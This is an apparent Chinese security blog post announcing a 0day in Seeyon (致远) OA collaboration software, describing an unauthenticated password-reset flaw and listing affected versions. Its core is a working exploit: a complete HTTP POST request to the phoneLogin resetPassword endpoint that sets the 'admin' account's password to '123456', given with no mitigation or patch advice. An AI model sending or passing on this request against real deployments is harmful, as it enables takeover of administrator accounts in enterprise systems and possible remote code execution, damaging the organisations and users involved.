【New | 附EXP】致远OA 0day漏洞

0x01 前言

致远OA是一款协同管理平台,主要面向中大型、集团型企业和组织的协同管理软件产品。该漏洞是由于致远OA修改用户密码时收发验证码的接口存在缺陷,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行未授权重置密码攻击,最终导致越权可以任意用户登录账号并可能进一步实现远程代码执行。

【New | 附EXP】致远OA 0day漏洞

0x02 漏洞影响

 影响版本

  • Seeyon OA=V5/G6
  • Seeyon OA=V8.1SP2
  • Seeyon OA=V8.2

0x03 漏洞利用

EXP:


POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip

{"loginName":"admin","password":"123456"}

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容